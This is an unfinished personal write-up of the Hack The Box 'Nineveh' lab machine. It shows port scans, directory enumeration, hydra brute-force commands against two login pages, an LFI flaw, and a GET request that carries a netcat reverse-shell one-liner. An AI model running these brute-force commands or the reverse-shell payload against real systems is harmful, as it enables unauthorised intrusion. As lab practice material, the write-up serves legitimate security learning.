HTB Write-up Nineveh


80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time

port 80 returned nothing but after configuring nineveh.htb to /etc/hosts, I got

ran the gobuster on the site.

Found a login page.

possible usernames - admin , amrois

MySQL in installed..?

tried different sqlmap options but had not luck..?

Trying to crack it with hydra:

hydra -l admin -P ~/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 54

password = 1q2w3e4r5t

http admin page:

notes page has LFI vuln?

include(): it's executing the php codes

This cool trick below encodes the php source code so we can read it


in this case it doesn't work.

HTTPS enum


After performing go buster, I found a phpLiteAdmin v1.9 login form.

interesting warning.

Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114


hydra -l admin -P ~/rockyou.txt nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:F=Incorrect"


Code execution on the site

Used this exploit:

now we can execute commands.

Sending it to burp and modify what we send to

GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f

Got the reverse shell but not tty

cannot complete due to slowness of the machine!

Last updated